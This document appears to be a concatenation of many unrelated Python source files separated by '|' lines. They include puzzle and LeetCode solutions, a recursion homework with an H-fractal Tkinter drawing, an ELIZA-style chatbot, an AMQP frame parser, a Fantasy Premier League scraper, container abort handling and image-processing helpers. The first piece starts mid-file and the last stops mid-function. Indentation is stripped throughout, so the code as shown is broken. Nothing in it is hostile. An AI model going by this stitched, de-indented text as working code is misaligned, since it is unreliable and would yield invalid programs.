assert count_trees(3, 1, "day3_testinput") == 7
assert count_trees(5, 1, "day3_testinput") == 3
assert count_trees(7, 1, "day3_testinput") == 4
assert count_trees(1, 2, "day3_testinput") == 2
print(count_trees(1, 1, "day3_input") *
count_trees(3, 1, "day3_input") *
count_trees(5, 1, "day3_input") *
count_trees(7, 1, "day3_input") *
count_trees(1, 2, "day3_input")
)
|
#!/usr/bin/env python
"""
pyjld.amqp.client_0_8.layers.frame
"""
__author__ = "Jean-Lou Dupont"
__email = "python (at) jldupont.com"
__fileid = "$Id$"
__all__ = ['FrameException',
'FrameLayer',
]
from pyjld.amqp.client_0_8.base import BaseException
from pyjld.amqp.client_0_8.layers.base import LayerBase
class FrameException(BaseException):
"""
Protocol level Exception
"""
class FrameLayer(LayerBase):
"""
Handles the frame layer
"""
_ATTRIBUTES = [ 'type', 'cycle', 'channel', 'size'
]
# type attr expected/value
_DIRECTIVES = [ ( "octet", None, 65), #A
( "octet", None, 77), #M
( "octet", None, 81), #Q
( "octet", None, 80), #P
( "octet", None, 1),
( "octet", None, 1),
( "octet", None, 9),
( "octet", None, 1),
( "octet", "type", None),
( "octet", "cycle", None),
( "short", "channel", None),
( "long", "size", None),
]
def readHeader(self):
self._readList(FrameLayer._DIRECTIVES)
def readBody(self):
pass
def readFooter(self):
try:
footer = self._stream.read_octet()
except:
self._raise("error reading footer",
"error_protocol_reading_footer")
if footer != "\xce":
self._raise("invalid footer",
"error_protocol_invalid_footer")
def writeHeader(self):
self._writeList(FrameLayer._DIRECTIVES)
def writeBody(self):
pass
def writeFooter(self):
self._stream.write_octet("\xCE")
def _getExceptionClass(self):
return FrameException
|
from string import Template
from datetime import datetime
from sage.matrix.constructor import matrix
from sage.calculus.var import var
def write_tikz_lines_to_file(lines, filename='new_results.tex', joiner='\n'):
joiner = None if isinstance(lines, str) else joiner
with open(filename,'w') as fp:
fp.write(joiner.join(lines) if joiner else lines)
return filename
def write_tex_files(build_bash_script=None, *dictionaries):
bash_commands = []
def instantiate_command(appender=lambda cmd: None, **kwds):
command_template = "{comment_hash}{typeset_command} {filename}{redirection}"
# observe that `kwds' argument needs to be unpacked in the call to
# `format', otherwise `kwds', which is a dictionary, is interpreted as
# a positional argument, while we care about pairs in it.
cmd = command_template.format(**kwds)
appender(cmd)
return cmd
for dictionary in dictionaries:
for filename, content_dict in dictionary.items():
content = content_dict['content']
write_tikz_lines_to_file(content, filename)
if build_bash_script:
instantiate_command(
appender=bash_commands.append,
comment_hash='# ' if not content_dict['typesettable'] else '',
typeset_command='lualatex',
filename=filename,
redirection='')
write_tikz_lines_to_file(bash_commands, build_bash_script)
def substitute_from_filename(template_filename, **substitutions):
with open(template_filename) as tf:
content = Template(tf.read())
return content.safe_substitute(substitutions)
def timed_execution(block):
start_timestamp=datetime.now()
results = block()
#try: results = block()
#except Exception as e: results = e
return results, datetime.now() - start_timestamp
class AbstractNegativesChoice:
def dispatch_on(self, recipient): pass
class IgnoreNegativesChoice:
def dispatch_on(self, recipient, *args):
return recipient.dispatched_from_IgnoreNegativesChoice(self, *args)
class HandleNegativesChoice:
def dispatch_on(self, recipient, *args):
return recipient.dispatched_from_HandleNegativesChoice(self, *args)
class NumberedColoursTable:
def colour_of(self, negatives_handling_choice, element):
return negatives_handling_choice.dispatch_on(self, element)
def dispatched_from_IgnoreNegativesChoice(self, choice, witness):
return str(witness)
def dispatched_from_HandleNegativesChoice(self, choice, witness):
sign, witness_class = witness
return str(witness_class) + ('-for-negatives' if sign < 0 else '')
class ForFilename:
def dispatch_on(self, recipient, *args):
return recipient.dispatched_from_ForFilename(self, *args)
class ForSummary:
def dispatch_on(self, recipient, *args):
return recipient.dispatched_from_ForSummary(self, *args)
def make_square_matrix_from_functions(n, d, h, y=var('y')):
n=20
series_expansions = [d(y).series(y,n)]
series_expansions += [(d(y)*(h(y)**k)).series(y, n) for k in range(1,n)]
def mk_element(i,j):
expansion = series_expansions[j].truncate()
coefficients = expansion.coefficients(y, sparse=False)
print ((i,j), expansion)
return coefficients[i] if i < len(coefficients) else 0
return matrix(n, mk_element)
|
########################################
# Name: Joyce Moon #
# Andrew ID: seojinm #
# Section: B #
########################################
####################
# Question 0 #
# Study the notes! #
####################
'''
Carefully go over the recursion examples seen in class and recitation.
Make sure that you are able to reproduce the solutions by yourself.
This will help you a lot with the homework and the exam!!!
'''
##################################
# Question 1 #
# Reasoning about recursive code #
##################################
# Do "Reasoning About (Recursive) Code" from
# http://www.kosbie.net/cmu/fall-11/15-112/handouts/hw5.html#Reasoning
# Put your answers below in a triple-quoted string.
# def f(n):
# # assume n is a non-negative integer
# if (n < 10):
# return 1
# else:
# return 1 + f(n/10)
# """ returns the digit count of the n"""
# def f(a):
# # assume a is a list of strings
# if (len(a) == 0):
# return ""
# else:
# x = f(a[1:])
# if (len(x) > len(a[0])):
# return x
# else:
# return a[0]
# """return the first string in the list if the length of the next string is
# smaller or equal to the length of this string. Or, the last string
# if the length of strings are increasing throughout the list."""
# def f(a):
# # assume a is a list of integers
# if (len(a) == 0):
# return 0
# elif (len(a) == 1):
# return (a[0] % 2)
# else:
# i = len(a)//2
# return f(a[:i]) + f(a[i:])
# """returns the number of odd numbers"""
# def f(n):
# # assume n is a non-negative integer
# if (n == 0):
# return 1
# else:
# return 2*f(n-1)
# """returns 2 to n power"""
# def f(n):
# # assume n is a non-negative integer
# if (n == 0):
# return 0
# else:
# return f(n-1) + 2*n - 1
# """return n square"""
# Hint: you may want to try this function with a few sample values.
# The answer should quickly become apparent, though you may wish to
# think about why the answer is in fact what it is.
############################
# Question 2 #
# No loops, only recursion #
############################
# Complete the functions below. Your solutions must be completely recursive.
# In particular, you will not receive any points if you use a "for" loop
# or a "while" loop.
'''
Write the function interleave(s1, s2) that takes two strings, s1 and s2,
and interleaves their characters starting with the first character in s1.
For example, interleave('pto', 'yhn') would return the string "python".
If one string is longer than the other, concatenate the rest of the
remaining string onto the end of the new string.
For example, ('a#', 'cD!f2') would return the string "ac#D!f2".
'''
def interleave(s1, s2):
if len(s1)==0:
return s2
elif len(s2)==0:
return s1
else:
return s1[0]+s2[0]+interleave(s1[1:],s2[1:])
'''
This function takes an integer n as input. It returns a string of the form
"1 1 2 1 2 3 1 2 3 4 1 2 3 4 5 ...... 1 2 3 4 5 6 7 8...n"
For example, if n is 4, it should return "1 1 2 1 2 3 1 2 3 4".
'''
def foo(n):
if (n == 1): return "1"
else:
result=fooHelper(n,1)
return foo(n-1)+" "+result
def fooHelper(n,s):
if s==n:
return str(s)
else:
return str(s)+" "+fooHelper(n,s+1)
'''
In class we saw an example of a non-destructive reverse function.
Write the same function, but this time make it destructive.
'''
def reverse(L):
if (len(L) == 0 or len(L) == 1): return L
else:
last=L.pop(-1)
start=L.pop(0)
return [last] + reverse(L) + [start]
'''
The function removeDuplicates(s) takes a string s as input.
If there is any character that repeats itself consecutively,
it deletes the repeated copies. For example, if the input is "abccdeeef",
the function returns "abcdef".
'''
def removeDuplicates(s):
if len(s)==0:
return ""
elif len(s)==1:
return s
elif s[0]!=s[1]:
return (s[0]+removeDuplicates(s[1:]))
elif s[0]==s[1]:
return (removeDuplicates(s[1:]))
'''
Write the recursive function flatten(L), which takes a list
which may contain lists (which themselves may contain lists, and so on),
and returns a single list (which does not contain any other lists)
which contains each of the non-lists, in order, from the original list.
This is called flattening the list. For example:
flatten([1,[2]]) returns [1,2]
flatten([1,2,[3,[4,5],6],7]) returns [1,2,3,4,5,6,7]
flatten(['wow', [2,[[]]], [True]]) returns ['wow', 2, True]
flatten([]) returns []
flatten([[]]) returns []
flatten(3) returns 3 (not a list)
'''
def flatten(L):
if L==[]:
return L
if type(L[0])!=list:
return (L[:1]+flatten(L[1:]))
else:
return flatten(L[0]+flatten(L[1:]))
'''
Write the function isPerfectNumber that takes a possibly-negative integer n
and returns True if it is a perfect number and False otherwise,
where a number is perfect if it is the sum of its positive divisors less than itself.
We'll assume 0 is perfect.
The next perfect number is 6 because 6 = 1 + 2 + 3.
The next one is 28 because 28 = 1 + 2 + 4 + 7 + 14.
The next one is 496, then 8128, ...
'''
import math
#check if n and the sum of its divisors are the same
def isPerfectNumber(n):
return n==isPNhelper(n)
#recursion of adding up the divisors except itself
def isPNhelper(n,m=1):
if m==n-1:
return 0
if n%m!=0:
return isPNhelper(n,m+1)
if n%m==0:
return m+isPNhelper(n,m+1)
################
# Question 3 #
# Backtracking #
################
'''
Modify the solve(n, m, constraints) function seen in class
(for the nQueens problem) so that instead of returning a solution,
it returns the total number of solutions.'''
## basic code from website
def nQueens(n):
queenRow = [-1] * n
count=[0]
def isLegal(row, col):
# a position is legal if it's on the board (which we can assume
# by way of our algorithm) and no prior queen (in a column < col)
# attacks this position
for qcol in range(col):
qrow = queenRow[qcol]
if ((qrow == row) or
(qcol == col) or
(qrow+qcol == row+col) or
(qrow-qcol == row-col)):
return False
return True
def solve(col):
#base case
if (col == n):
count[0]+=1
else:
# try to place the queen in each row in turn in this col,
# and then recursively solve the rest of the columns
for row in range(n):
if isLegal(row,col):
queenRow[col] = row # place the queen and hope it works
solution = solve(col+1)
if (solution != None):
# ta da! it did work
return solution
queenRow[col] = -1 # pick up the wrongly-placed queen
# shoot, can't place the queen anywhere
return None
solve(0)
return count[0]
'''
Background: we will say that a board is a square 2d list of integers.
As with mazes, a solution is a path from the left-top to the right-bottom,
only here we will only allow moves that are up, down, left and right (no diagonals).
A solution is an "increasing path" (a coined term) if each value
on the solution path is strictly larger than the one before it on that path.
Consider this board:
board = [[ 1, 3, 2, 4 ],
[ 0, 4, 0, 3 ],
[ 5, 6, 8, 9 ],
[ 0, 7, 8, 9 ]]
This board has exactly one increasing path:
right to 3, down to 4, down to 6, down to 7, right to 8, right to 9.
With this in mind, write the function increasingPathCount(board)
that takes such a board and returns the number of increasing paths
running from the left-top to right-bottom in that board.
For the example board above, your function would return 1.
Similarly, consider this board:
board = [ [3, 5],
[4, 7] ]
For this board, your function would return 2:
those paths being right,down and also down,right.
Your solution must be recursive (but you can use iteration too).
Also, you cannot simply explore every possible path to solve this problem.
'''
def increasingPathCount(board):
result=[0]
def solve(row,col):
#if arrive at the end point, increase the count
#base case
if (row,col)==(len(board)-1,len(board)-1):
result[0]+=1
else:
#recursions
if col!=len(board)-1 and board[row][col+1]>board[row][col]:
solve(row,col+1)
if col!=0 and board[row][col-1]>board[row][col]:
solve(row,col-1)
if row!=0 and board[row-1][col]>board[row][col]:
solve(row-1,col)
if row!=len(board)-1 and board[row+1][col]>board[row][col]:
solve(row+1,col)
solve(0,0)
return result[0]
##############
# Question 4 #
# H-fractal #
##############
'''
Do Question 6 from here: https://www.cs.cmu.edu/~112/notes/hw9.html
Please follow the directions given in the hint:
"The H that is drawn right in the middle should always have the same size
(the width and height should be half the window width and height).
At each level, we draw new H's with half the dimensions of the previous level.
This is why the window size never has to change
(since 1 + 1/2 + 1/4 + 1/8 + ... = 2)."
The pictures in mathworld.wolfram.com are misleading!
At each level, the largest H in the middle should have the same size.
'''
from tkinter import *
####################################
# customize these functions
####################################
def init(data):
data.level=0
#return a list of 4 tuples of end points in the shape H
def getPoints(data,level,point):
x=point[0]
y=point[1]
w=int((data.width*0.5**(level+1))/2)
h=int((data.height*0.5**(level+1))/2)
return [(x-w,y-h),(x-w,y+h),(x+w,y-h),(x+w,y+h)]
def mousePressed(event, data):
# use event.x and event.y
pass
#increase and decrease the level depending on the key press
def keyPressed(event,data):
if event.keysym == "Down":
if data.level > 0:
data.level -= 1
elif event.keysym == "Up":
data.level += 1
def timerFired(data):
pass
######draw functions#######
def redrawAll(canvas, data):
redrawAll2(canvas,data,(data.width/2,data.height/2))
#recursion draw
def redrawAll2(canvas, data, point=(-1,-1),level=0, points=[]):
points=getPoints(data,level,point)
drawHelper(canvas,data,level,points)
if level==data.level:
return
for point in points:
redrawAll2(canvas,data,point,level+1,points)
#draw H shape
def drawHelper(canvas,data,level,points):
for i in range(0,len(points),2):
canvas.create_line(points[i],points[i+1],fill="blue")
midPoint=int((points[0][1]+points[1][1])/2)
canvas.create_line(points[0][0],midPoint,points[2][0],midPoint,fill="red")
####################################
# use the run function as-is
####################################
def run(width=300, height=300):
def redrawAllWrapper(canvas, data):
canvas.delete(ALL)
redrawAll(canvas, data)
canvas.update()
def mousePressedWrapper(event, canvas, data):
mousePressed(event, data)
redrawAllWrapper(canvas, data)
def keyPressedWrapper(event, canvas, data):
keyPressed(event, data)
redrawAllWrapper(canvas, data)
def timerFiredWrapper(canvas, data):
timerFired(data)
redrawAllWrapper(canvas, data)
# pause, then call timerFired again
canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)
# Set up data and call init
class Struct(object): pass
data = Struct()
data.width = width
data.height = height
data.timerDelay = 100 # milliseconds
init(data)
# create the root and the canvas
root = Tk()
canvas = Canvas(root, width=data.width, height=data.height)
canvas.pack()
# set up events
root.bind("<Button-1>", lambda event:
mousePressedWrapper(event, canvas, data))
root.bind("<Key>", lambda event:
keyPressedWrapper(event, canvas, data))
timerFiredWrapper(canvas, data)
# and launch the app
root.mainloop() # blocks until window is closed
print("bye!")
def Hfractal():
run(600,600)
####################################
# test cases
####################################
def testInterleave():
print("testing interleave...")
assert(interleave('a#', 'cD!f2')=="ac#D!f2")
assert(interleave('abc', '')=="abc")
print("passed")
def testFoo():
print("testing foo...")
assert(foo(4)=="1 1 2 1 2 3 1 2 3 4")
assert(foo(3)=="1 1 2 1 2 3")
print("passed")
def testReverse():
print("testing reverse...")
assert(reverse([1,2,3])==[3,2,1])
assert(reverse([3,2,1])==[1,2,3])
print("passed")
def testRemoveDuplicates():
print("testing removeDuplicates...")
assert(removeDuplicates("111")=="1")
assert(removeDuplicates("1112")=="12")
print("passed")
def testFlatten():
print("testing flatten...")
assert(flatten([[]])==[])
assert(flatten([1,2,[3,[4,5],6],7])==[1,2,3,4,5,6,7])
print("passed")
def testIsPerfectNumber():
print("testing isPerfectNumber...")
assert(isPerfectNumber(6))
assert(not isPerfectNumber(7))
print("passed")
def testNQueens():
print("testing nQueens...")
assert(nQueens(1)==1)
assert(nQueens(2)==0)
assert(nQueens(4)==2)
print("passed")
def testIncreasingPathCount():
print("testing increasingPathCount...")
assert(increasingPathCount([ [3, 5],[4, 7] ])==2)
assert(increasingPathCount([[ 1, 3, 2, 4 ],
[ 0, 4, 0, 3 ],
[ 5, 6, 8, 9 ],
[ 0, 7, 8, 9 ]])==1)
print("passed")
def testAll():
testInterleave()
testFoo()
testReverse()
testRemoveDuplicates()
testFlatten()
testIsPerfectNumber()
testNQueens()
testIncreasingPathCount()
|
#!/bin/env python
# conding:utf-8
|
class Solution:
def minimumTotal(self, triangle: List[List[int]]) -> int:
"""
https://leetcode.com/problems/triangle/
use dp. start from the bottom row.
"""
n = len(triangle)
dp = [[0]*len(triangle[i]) for i in range(n)]
dp[-1] = triangle[-1]
print(dp)
for i in range(n-2, -1, -1):
for j in range(len(triangle[i])):
dp[i][j] = min(triangle[i][j] + dp[i+1][j], triangle[i][j] + dp[i+1][j+1])
return dp[0][0] |
from django.views.generic import TemplateView
from .models import TextAnimate
# Create your views here.
class HomeView(TemplateView):
template_name = "index.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
text_animate = TextAnimate.objects.all()
context["text_animate"] = text_animate
context["text_animatelen"] = len(text_animate)
return context
|
from __future__ import division
from __future__ import absolute_import
import scipy as sp
speed_of_light = 299792.458 # Speed of light in km/s
class plummer:
def __init__(self, a, lum):
self.a = a
self.lum = lum
def nu(self, x):
a = self.a
return (3/(4*sp.pi * self.a**3 )) * (1 + (x/self.a)**2)**(-5/2)
def j(self, x):
L = self.lum
a = self.a
return L * (3/(4*sp.pi * a**3 )) * (1 + (x/a)**2)**(-5/2)
class hernquist:
def __init__(self, a, lum):
self.a = a
self.lum = lum
def nu(self, x):
a = self.a
return (1 / (2*sp.pi) ) * (a/x) / (a + x)**3
def j(self, x):
L = self.lum
a = self.a
return (L / (2*sp.pi) ) * (a/x) / (a + x)**3
|
# =============================================================================
# #Programming Assignment 1 - Eliza Chatbot
#
# #Team Members - Abhishek Shambhu , Jeyamurugan Krishnakumar & Shreyans Singh
#
# #Team Name - Team Bots
#
# #Description - We started by importing the regular expression(re), random, datetime and time library.
# Then we added the dictionary for most used nouns(Noun_reflections) and pronouns(Pronoun_reflections)
# which would help us in word spotting from the questions and transform it according to the answers.
# Then we added the Expressions as in Regular Expressions - using the re library to match the
# questions or statements given by user as input and then some random answers(using the random
# library)
#
# #What out Chatbot can do? - We have tried to implement the chatbot using pattern matching techniques -
# Regular Expressions or Regexes which allows the chatbot to converse with a human by following the rules
# and directions of the script.
# This chatbot, in specific, can engage in a conversation based on certain patterns.
# Although this chatbot does not explictly recognize complex word mathcing, minimal context it attempts
# to present itself in a humane manner since only regexes were used.
#
# =============================================================================
#Importing Regular expressions
import re
#Importing random module to get random responses
import random
#Importing system datatime to greet the user based on time
import datetime
#importing time for time.sleep() functionality so that the responses of ELIZA looks real
import time
#Dictionary where we are replacing some noun words in the user input sentence with its corresponding pair(Word Spotting)
Noun_dict = {
"crave": "craving",
"avoid": "avoiding",
"celebrate": "celebration",
"resent": "resentment",
"feel": "feeling",
"forgive": "forgiveness",
"smoke": "smoking",
"arrange": "arrangement",
"write": "writing",
"prefer": "preference",
}
#Dictionary where we are replacing most common pronoun words in the user input sentence with its corresponding pair(Word Spotting)
Pronoun_dict = {
"am": "are",
"was": "were",
"i": "you",
"i'd": "you would",
"i've": "you have",
"i'll": "you will",
"my": "your",
"are": "am",
"you've": "I have",
"you'll": "I will",
"your": "my",
"yours": "mine",
"you": "me",
"me": "you"
}
#Expressions list containing a two element list i.e. key value pair.
#The first is the regular expression and the second is a list of responses and
#any of the possible response is selected any shown as output by ELIZA
Expressions = [
# I want ...
[r'(?i)I want (.*)',
["Do you really want {0}?",
"Will it make you happy if you get {0}?",
"Why do you need {0}?"]],
# Do you ...?
[r'(?i)Do you ([^\?]*)\??',
["Yes, I do.",
"No, I do not {0} because I am a chatbot.",
"Kinda."]],
# I need ...
[r'(?i)I need (.*)',
["Will you be fine if you don't get {0}?",
"Will it make you happy if you get {0}?",
"Why do you need {0}?"]],
# I don't/dont need ...
[r'(?i)I don\'?t need (.*)',
["Are you sure you do not need {0}?",
"But I really think you need {0}.",
"Do you want my help in getting you {0}?"]],
# Yes ...
[r'(?i)(Y|y)es(.*)',
["I am really excited to hear that.",
"Tell me more about it?"]],
# No ...
[r'(?i)(N|n)o(.*)',
["Don't be so negative.",
"You should definetely give it a try!"]],
# ...tell...joke
[r'(?i)tell(.*)joke(.*)',
["Friday is my second favourite F word.",
"If a stranger offers you a piece of candy..take two!!"]],
# I am...
[r'(?i)I am (.*)',
["Are you proud that you are {0}?",
"Are you happy to be {0}?",
"I am not surprised by that!"]],
# I m...
[r'(?i)I\'?m(.*)',
["How do you feel being {0}?",
"For how long have you been {0}?",
"Why do you think you are {0}?"]],
# Are you...
[r'(?i)Are you ([^\?]*)\??',
["What would happen if I was not {0}?",
"I am not sure whether I am {0}. What do you think?"]],
# I think I...
[r'(?i)I think I(.*)',
["Why don't you tell me more about your {0}?"]],
# I think I'm...
[r'(?i)I think I\'m(.*)',
["Why don't you tell me more about your {0}?"]],
# ...sorry...
[r'(.*)sorry(.*)',
["I am just a chatbot. I do not require any apology.",
"What feelings do you have when you apologize?",
"There are many times when no apology is needed."]],
# What...
[r'(?i)What ([^\?]*)\??',
["Why do you ask that?",
"Is this thing really important to you?",
"What do you think?"]],
# How...
[r'(?i)How ([^\?]*)\??',
["I am not sure about that.",
"Just believe in your instincts!",
"Why do you think that?"]],
# Because...
[r'(?i)(b|B)ecause(.*)',
["Is this true?",
"What else crosses your mind?"]],
# ...I think ...
[r'(?i)I think (.*)',
["Do you really believe so?",
"Are you sure?"]],
# ... family ...
[r'(.*)family(.*)',
["Where does your family live?",
"How many people are there in your family?"]],
# Is it ...
[r'(?i)Is it([^\?]*)\??',
["If it were {0}, what would you do?"]],
# It is...
[r'(?i)It is (.*)',
["You seem very certain.",
"If I told you that it probably isn't {0}, what would you feel?"]],
# Can you...
[r'(?i)Can you ([^\?]*)\??',
["I am just a chatbot. I am not God!!",
"What if I could {0}?",
"Will it make you happy if I could {0}"]],
# Can I...
[r'(?i)Can I ([^\?]*)\??',
["I am not pushing you. It is all upto you if you want to {0}",
"Do you think you could {0}?"]],
# Question
[r'(.*)\?',
["I believe you can answer this yourself",
"Is it really necessary to answer this?",
"I never thought abut it"]],
# Statement
[r'(.*)',
["Can you please elaborate more?",
"Ohh. I see. Does it make you feel happy?",
"That is interesting!",
"What do you mean?",
"Try explaining more about it"]]
]
#The reflect function takes input and it turns it to lower case, splits it to words and strip the word from both sides.
#Then we do a for loop to check this word with all the words in our noun and pronouns dictionary and if found in dictionary
#replace that word with its key value pair.
def correspond_words(response_match):
words = response_match.lower().split()
for index, word in enumerate(words):
if word in Pronoun_dict:
words[index] = Pronoun_dict[word]
if word in Noun_dict:
words[index] = Noun_dict[word]
return ' '.join(words)
def process(user_input):
#Here, we are doing for loop to match our input with all the patterns in expressions
for pattern, responses in Expressions:
#Here, we compare input statement with the pattern in expressions and see whether it matches.
match = re.match(pattern, user_input.rstrip(".!"))
if match:
#Based on adequate match it will give random responses for that match that was entered and will return a response from the list.
response_match = random.choice(responses)
for words in match.groups():
return response_match.format(*[correspond_words(words)])
#This is the main Eliza interface function
def elisa():
#Print function where Eliza introduces herself and asks for username
print("ELIZA: Hi, I'm ELIZA a psychotherapist. What is your name?")
#User entered input is taken in name_sentence variable
name_sentence = input("USER: ")
#time.sleep(secs) will pause the execution so that the chatbot's reply looks real
time.sleep(2)
#Here, i am splitting each word from input entered in a list
sent_split = name_sentence.split()
#Here, i am taking the last word into name as the user might enter
#Ex. my name is abhishek or you can call me by abhishek
#So, considering last word as name and taking that as input
name = sent_split[-1]
#Here, i wanted to greet the user based on the system time
currentTime = datetime.datetime.now()
times = currentTime.hour
if 5 <= times < 12:
greet = 'Good Morning.'
elif 12 <= times < 16:
greet = 'Good Afternoon.'
elif 16 <= times < 20:
greet = 'Good Evening.'
else:
greet = "It's night now."
#Print function where it replies with name and greetings
print(f"ELIZA: Hi {name}. {greet} What do you want to ask me today?")
while True:
#
exit_list = ("goodbye","Goodbye","Bye","bye","See you later","quit","Quit","Exit","exit")
user_input=input("USER: ")
if user_input in exit_list:
#If input entered is from any of the above list prints ending message and ends the conversation
print("ELIZA: Have a nice day. Good bye Human!")
break
else:
#time.sleep(secs) will pause the execution so that the chatbot's reply looks real
time.sleep(2)
#display matched response after processing based on input entered
print("ELIZA: "+process(user_input))
if __name__ == "__main__":
elisa()
|
import pandas as pd
import requests
from collections import namedtuple
OVERALL_LEAGUE = 314
LEAGUE_API = 'https://fantasy.premierleague.com/api/leagues-classic/'
STANDINGS = '/standings/?page_standings='
NUM_MANAGERS = 500 # 10000
def parse_standings_page(standings_page):
Entry = namedtuple('Entry', standings_page['results'][0].keys())
entries = []
for entry_dict in standings_page['results']:
entry = Entry._make(entry_dict.values())
entries.append(entry)
return entries
def main():
url = LEAGUE_API + str(OVERALL_LEAGUE) + STANDINGS
page = 1
overall_league_standings = requests.get(
LEAGUE_API + str(OVERALL_LEAGUE) + STANDINGS + str(page)
).json()['standings']
standings = []
while overall_league_standings['has_next'] and len(standings) < NUM_MANAGERS:
standings.extend(parse_standings_page(overall_league_standings))
page += 1
overall_league_standings = requests.get(
LEAGUE_API + str(OVERALL_LEAGUE) + STANDINGS + str(page)
).json()['standings']
if len(standings) % 100 == 0:
print(len(standings))
standings.extend(parse_standings_page(overall_league_standings))
standings = standings[:NUM_MANAGERS]
standings = pd.DataFrame.from_records(standings, columns=standings[0]._asdict().keys())
standings = standings.set_index('id')
print(standings.head())
standings.to_csv(f'./data/top-{NUM_MANAGERS}-managers.csv')
if __name__ == "__main__":
main()
|
"""Manages Treadmill applications lifecycle.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import os
import enum
from treadmill import appevents
from treadmill import fs
from treadmill import supervisor
from treadmill import utils
from treadmill.apptrace import events
_LOGGER = logging.getLogger(__name__)
ABORTED_UNKNOWN = {
'why': 'unknown',
'payload': None,
}
class AbortedReason(enum.Enum):
"""Container abort reasons.
"""
# W0232: Class has no __init__ method
# pylint: disable=W0232
UNKNOWN = 'unknown'
INVALID_TYPE = 'invalid_type'
TICKETS = 'tickets'
SCHEDULER = 'scheduler'
PORTS = 'ports'
PRESENCE = 'presence'
IMAGE = 'image'
PID1 = 'pid1'
GMSA = 'GMSA'
TIMEOUT = 'timeout'
def description(self):
"""Gets the description for the current aborted reason."""
return {
AbortedReason.INVALID_TYPE: 'invalid image type',
AbortedReason.TICKETS: 'tickets could not be fetched',
AbortedReason.SCHEDULER: 'scheduler error',
AbortedReason.PORTS: 'ports could not be assigned',
AbortedReason.IMAGE: 'could not use given image',
AbortedReason.PID1: 'pid1 failed to start',
AbortedReason.GMSA: 'host is not part of GMSA group'
}.get(self, self.value)
def abort(container_dir, why=None, payload=None):
"""Abort a running application.
Called when some initialization failed in a running container.
"""
flag_aborted(container_dir, why, payload)
container_dir = os.path.realpath(os.path.join(container_dir, '../'))
supervisor.control_service(container_dir,
supervisor.ServiceControlAction.down)
def _why_str(why):
"""Gets the string for app aborted reason."""
if isinstance(why, AbortedReason):
return why.value
return str(why)
def flag_aborted(container_dir, why=None, payload=None):
"""Flags container as aborted.
Called when aborting in failed run step.
Consumed by cleanup script.
"""
if payload is not None:
payload = str(payload)
fs.write_safe(
os.path.join(container_dir, 'aborted'),
lambda f: f.writelines(
utils.json_genencode(
{
'why': _why_str(why),
'payload': payload
}
)
),
mode='w',
permission=0o644
)
def report_aborted(tm_env, instance, why=None, payload=None):
"""Report an aborted instance.
Called when aborting after failed configure step or from cleanup.
"""
if payload is not None:
payload = str(payload)
appevents.post(
tm_env.app_events_dir,
events.AbortedTraceEvent(
instanceid=instance,
why=_why_str(why),
payload=payload
)
)
|
#Conditionals
"Python conditionals are pretty much like java and javascript the operators are relatively the same and function in the same way"
"Python relies on indentation to to define scope so this must be used in python to start an if"
if 2>1:
print("true")
"Elif is pretty much like else if in other languages meaning if the previous conditions werent true try this one"
a=33
b=33
if a>b:
print("a is greater than b")
elif a==b:
print("there the same")
"else statements are the same for anything that isnt caught"
"python allows for short hand if statements"
if a==b: print("The same again")
"Also yoyu can do a do a short hand if else [expression condtion else expression] you can do multipple of these in one line "
print("im right") if a==b else print("im wrong")
#These short hand expressions are known as ternary expressions
"In python instread of using && || you use and & or for logical operations"
"If's should not be empty but if you need it to be empty use the pass keyword"
if a<b:
pass |
# -*- coding: utf-8 -*-
from collections import Counter
class Solution:
def checkAlmostEquivalent(self, word1: str, word2: str) -> bool:
counts1, counts2 = Counter(word1), Counter(word2)
return self._check(counts1, counts2) and self._check(counts2, counts1)
def _check(self, counts1: dict, counts2: dict) -> bool:
for char, count in counts1.items():
if char in counts2 and abs(count - counts2[char]) > 3:
return False
if char not in counts2 and count > 3:
return False
return True
if __name__ == "__main__":
solution = Solution()
assert not solution.checkAlmostEquivalent("aaaa", "bccb")
assert solution.checkAlmostEquivalent("abcdeef", "abaaacc")
assert solution.checkAlmostEquivalent("cccddabba", "babababab")
|
from PIL import Image
from n1_local_image_descriptors import sift
from numpy import *
from pylab import *
import os
def process_image_dsift(imagename, resultname, size=20, steps=10,
force_orientation=False, resize=None):
""" Process an image with densely sampled SIFT descriptors
and save the results in a file. Optional input: size of features,
steps between locations, forcing computation of descriptor orientation
(False means all are oriented upward), tuple for resizing the image."""
im = Image.open(imagename).convert('L')
if resize != None:
im = im.resize(resize)
m, n = im.size
if imagename[-3:] != 'pgm':
# create a pgm file
im.save('tmp.pgm')
imagename = 'tmp.pgm'
# create frames and save to temporary file
scale = size / 3.0
x, y = meshgrid(range(steps, m, steps), range(steps, n, steps))
xx, yy = x.flatten(), y.flatten()
frame = array([xx, yy, scale * ones(xx.shape[0]), zeros(xx.shape[0])])
savetxt('tmp.frame', frame.T, fmt='%03.3f')
if force_orientation:
cmmd = str("sift " + imagename + " --output=" + resultname +
" --read-frames=tmp.frame --orientations")
else:
cmmd = str("sift " + imagename + " --output=" + resultname +
" --read-frames=tmp.frame")
os.system(cmmd)
print('processed', imagename, 'to', resultname)
def example():
process_image_dsift('empire.jpg','empire.sift',90,40,True)
l,d = sift.read_features_from_file('empire.sift')
im = array(Image.open('empire.jpg'))
sift.plot_features(im,l, True)
show()
# example() |
from typing import List
from base.Event import Event
class PartialMatch:
"""
A partial match created at some intermediate stage during evaluation.
"""
def __init__(self, events: List[Event]):
self.events = events
self.last_timestamp = max(events, key=lambda x: x.timestamp).timestamp
self.first_timestamp = min(events, key=lambda x: x.timestamp).timestamp
def __repr__(self):
return "PartialMatch with events={}, first_timestamp={}, last_timestamp={}".format(
self.events, self.first_timestamp, self.last_timestamp
)
|
import cv2
import numpy as np
def mke_coordinate(image,line_param):
slope, intecept = line_param
y1 = int(image.shape[0])
y2 = int(y1 *(3/5))
x1 = int((y1-intecept)/slope)
x2 = int((y2-intecept)/slope)
return np.array([x1, y1, x2, y2])
def avarage_line_intercept(image,lines):
left_fit =[]
right_fit =[]
for line in lines:
x1, y1, x2, y2 = line.reshape(4)
parameters = np.polyfit((x1, y1),(x2, y2), 1)
slope = parameters[0]
intercept = parameters[1]
if slope <0:
left_fit.append((slope,intercept))
else:
right_fit.append((slope,intercept))
left_line_avg = np.average(left_fit,axis=0)
right_line_avg = np.average(right_fit,axis=0)
left_line = mke_coordinate(image, left_line_avg)
right_line = mke_coordinate(image, right_line_avg)
return np.array([left_line, right_line])
def canny(image):
gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
